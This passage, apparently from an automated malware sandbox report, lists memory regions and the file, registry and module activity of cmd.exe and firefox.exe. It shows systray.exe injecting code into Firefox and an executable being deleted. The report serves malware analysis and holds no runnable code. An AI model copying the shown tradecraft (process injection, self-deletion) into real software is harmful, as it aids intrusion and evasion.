|
- |
| private_0x00000000773c0000 | 0x773c0000 | 0x774defff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000774e0000 | 0x774e0000 | 0x775d9fff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x775e0000 | 0x77788fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x777c0000 | 0x7793ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (25)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Windows\system32 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework\v4.0.30319 | type = file_attributes |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
8 | |
| Open | STD_INPUT_HANDLE | - |
|
3 | |
| Open | STD_ERROR_HANDLE | - |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 59 |
|
1 | |
| Write | STD_ERROR_HANDLE | size = 19 |
|
1 | |
| Delete | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x4acd0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76540000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x7656a84f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x76573b92 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76554a5d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x7656a79d |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-02-11 09:18:50 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 143864 |
|
1 |
Environment (11)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
4 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 |
Process #21: firefox.exe
3
0
| Information | Value |
|---|---|
| ID | #21 |
| File Name | c:\program files (x86)\mozilla firefox\firefox.exe |
| Command Line | "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:47, Reason: Child Process |
| Unmonitor | End Time: 00:02:49, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x8a8 |
| Parent PID | 0xbe4 (c:\windows\syswow64\systray.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
914
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00062fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000070000 | 0x00070000 | 0x001e3fff | Pagefile Backed Memory | rwx |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x001f3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0021ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000220000 | 0x00220000 | 0x00226fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x0026ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000270000 | 0x00270000 | 0x00271fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x003bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003c0000 | 0x003c0000 | 0x00d83fff | Pagefile Backed Memory | rw |
|
|
|
- |
| locale.nls | 0x00d90000 | 0x00df6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000e90000 | 0x00e90000 | 0x00e9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ed0000 | 0x00ed0000 | 0x00f4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f50000 | 0x00f50000 | 0x0104ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001090000 | 0x01090000 | 0x010cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000010d0000 | 0x010d0000 | 0x01257fff | Pagefile Backed Memory | r |
|
|
|
- |
| firefox.exe | 0x012d0000 | 0x01313fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x00000000012d0000 | 0x012d0000 | 0x01313fff | Pagefile Backed Memory | rwx |
|
|
|
- |
| pagefile_0x0000000001320000 | 0x01320000 | 0x014a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000014b0000 | 0x014b0000 | 0x028affff | Pagefile Backed Memory | r |
|
|
|
- |
| ntdll.dll | 0x028b0000 | 0x02a2ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000002b00000 | 0x02b00000 | 0x02bfffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x02c00000 | 0x02ecefff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000002ed0000 | 0x02ed0000 | 0x032c2fff | Pagefile Backed Memory | r |
|
|
|
- |
| freebl3.dll | 0x73e50000 | 0x73e9efff | Memory Mapped File | rwx |
|
|
|
- |
| nssdbm3.dll | 0x73ea0000 | 0x73eb6fff | Memory Mapped File | rwx |
|
|
|
- |
| softokn3.dll | 0x73ec0000 | 0x73ee6fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcp100.dll | 0x73ef0000 | 0x73f58fff | Memory Mapped File | rwx |
|
|
|
- |
| mozglue.dll | 0x73f60000 | 0x73f81fff | Memory Mapped File | rwx |
|
|
|
- |
| wsock32.dll | 0x73f90000 | 0x73f96fff | Memory Mapped File | rwx |
|
|
|
- |
| winmm.dll | 0x73fa0000 | 0x73fd1fff | Memory Mapped File | rwx |
|
|
|
- |
| nss3.dll | 0x73fe0000 | 0x74194fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcr100.dll | 0x741a0000 | 0x7425dfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x750d0000 | 0x7512bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75240000 | 0x7527efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752d0000 | 0x752d7fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75310000 | 0x7531bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75320000 | 0x7537ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75390000 | 0x7542ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75430000 | 0x754fbfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x75510000 | 0x75519fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x755d0000 | 0x7565ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x75660000 | 0x756b6fff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x758b0000 | 0x758e4fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x758f0000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x759e0000 | 0x759ebfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759f0000 | 0x75a08fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75b60000 | 0x75bfcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75c00000 | 0x75cabfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75cb0000 | 0x75d0ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x76110000 | 0x76155fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76380000 | 0x7647ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76540000 | 0x7664ffff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x76650000 | 0x7676cfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x76770000 | 0x773b9fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000773c0000 | 0x773c0000 | 0x774defff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000774e0000 | 0x774e0000 | 0x775d9fff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x775e0000 | 0x77788fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x77790000 | 0x77795fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x777c0000 | 0x7793ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00000000fffb0000 | 0xfffb0000 | 0xfffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000fffdb000 | 0xfffdb000 | 0xfffddfff | Private Memory | rw |
|
|
|
- |
| private_0x00000000fffde000 | 0xfffde000 | 0xfffdefff | Private Memory | rw |
|
|
|
- |
| private_0x00000000fffdf000 | 0xfffdf000 | 0xfffdffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000fffe0000 | 0xfffe0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #11: c:\windows\syswow64\systray.exe | 0xbe8 | address = 0x3c0000, size = 10240000 |
|
1 | |
| Modify Memory | #11: c:\windows\syswow64\systray.exe | 0xbe8 | address = 0x70000, size = 1523712 |
|
1 | |
| Modify Memory | #11: c:\windows\syswow64\systray.exe | 0xbe8 | address = 0x12d0000, size = 278528 |
|
1 |
Host Behavior
File (1)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | \??\C:\Windows\SysWOW64\ntdll.dll | desired_access = FILE_EXECUTE, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 |
Module (2)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Mapping | - | protection = PAGE_EXECUTE, maximum_size = 0 |
|
1 | |
| Map | - | process_name = c:\program files (x86)\mozilla firefox\firefox.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x28b0000 |
|
1 |
